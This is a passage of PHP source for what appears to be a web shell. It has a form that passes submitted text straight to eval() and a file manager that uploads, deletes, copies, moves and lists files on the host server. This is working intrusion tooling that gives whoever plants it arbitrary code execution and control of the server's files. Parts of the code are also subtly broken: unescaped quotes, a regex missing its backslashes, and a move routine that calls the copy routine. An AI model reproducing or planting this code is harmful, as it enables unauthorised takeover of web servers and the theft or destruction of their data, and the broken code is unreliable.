        $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
        echo $tmp;
        echo '</div><br>';
    }
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
        echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,'');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
    echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
    if(!empty($_POST['p1'])) {
        ob_start();
        eval($_POST['p1']);
        echo htmlspecialchars(ob_get_clean());
    }
    echo '</pre></div>';
    printFooter();
}

function actionFilesMan() {
    printHeader();
    echo '<h1>File manager</h1><div class=content>';
    if(isset($_POST['p1'])) {
        switch($_POST['p1']) {
            case 'uploadFile':
                if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
                    echo "Can't upload file!";
                break;
                break;
            case 'mkdir':
                if(!@mkdir($_POST['p2']))
                    echo "Can't create new dir";
                break;
            case 'delete':
                function deleteDir($path) {
                    $path = (substr($path,-1)=='/') ? $path:$path.'/';
                    $dh  = opendir($path);
                    while ( ($item = readdir($dh) ) !== false) {
                        $item = $path.$item;
                        if ( (basename($item) == "..") || (basename($item) == ".") )
                            continue;
                        $type = filetype($item);
                        if ($type == "dir")
                            deleteDir($item);
                        else
                            @unlink($item);
                    }
                    closedir($dh);
                    rmdir($path);
                }
                if(is_array(@$_POST['f']))
                    foreach($_POST['f'] as $f) {
                        $f = urldecode($f);
                        if(is_dir($f))
                            deleteDir($f);
                        else
                            @unlink($f);
                    }
                break;
            case 'paste':
                if($_SESSION['act'] == 'copy') {
                    function copy_paste($c,$s,$d){
                        if(is_dir($c.$s)){
                            mkdir($d.$s);
                            $h = opendir($c.$s);
                            while (($f = readdir($h)) !== false)
                                if (($f != ".") and ($f != "..")) {
                                    copy_paste($c.$s.'/',$f, $d.$s.'/');
                                }
                        } elseif(is_file($c.$s)) {
                            @copy($c.$s, $d.$s);
                        }
                    }
                    foreach($_SESSION['f'] as $f)
                        copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);                     
                } elseif($_SESSION['act'] == 'move') {
                    function move_paste($c,$s,$d){
                        if(is_dir($c.$s)){
                            mkdir($d.$s);
                            $h = opendir($c.$s);
                            while (($f = readdir($h)) !== false)
                                if (($f != ".") and ($f != "..")) {
                                    copy_paste($c.$s.'/',$f, $d.$s.'/');
                                }
                        } elseif(is_file($c.$s)) {
                            @copy($c.$s, $d.$s);
                        }
                    }
                    foreach($_SESSION['f'] as $f)
                        @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
                }
                unset($_SESSION['f']);
                break;
            default:
                if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
                    $_SESSION['act'] = @$_POST['p1'];
                    $_SESSION['f'] = @$_POST['f'];
                    foreach($_SESSION['f'] as $k => $f)
                        $_SESSION['f'][$k] = urldecode($f);
                    $_SESSION['cwd'] = @$_POST['c'];
                }
                break;
        }
        echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
    }
    $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
    if($dirContent === false) {    echo 'Can't open this folder!'; return;    }
    global $sort;
    $sort = array('name', 1);
    if(!empty($_POST['p1'])) {
        if(preg_match('!s_([A-z]+)_(d{1})!', $_POST['p1'], $match))
            $sort = array($match[1], (int)$match[2]);
    }
?>
<script>
    function sa() {
        for(i=0;i<document.files.elements.length;i++)
            if(document.files.elements[i].type == 'checkbox')
                document.files.elements[i].checked = document.files.elements[0].checked;
    }
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post>
<?php
    echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_".($sort[1]?0:1)."")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_".($sort[1]?0:1)."")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_".($sort[1]?0:1)."")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_".($sort[1]?0:1)."")'>Permissions</a></th><th>Actions</th></tr>";
    $dirs = $files = $links = array();
    $n = count($dirContent);
    for($i=0;$i<$n;$i++) {
        $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
        $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
        $tmp = array('name' => $dirContent[$i],
                     'path' => $GLOBALS['cwd'].$dirContent[$i],
                     'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
                     'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
                     'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
                     'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
                     'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
                    );
        if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
            $files[] = array_merge($tmp, array('type' => 'file'));
        elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
            $links[] = array_merge($tmp, array('type' => 'link'));
        elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
            $dirs[] = array_merge($tmp, array('type' => 'dir'));
    }
    $GLOBALS['sort'] = $sort;
    function cmp($a, $b) {
        if($GLOBALS['sort'][0] != 'size')
            return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
     &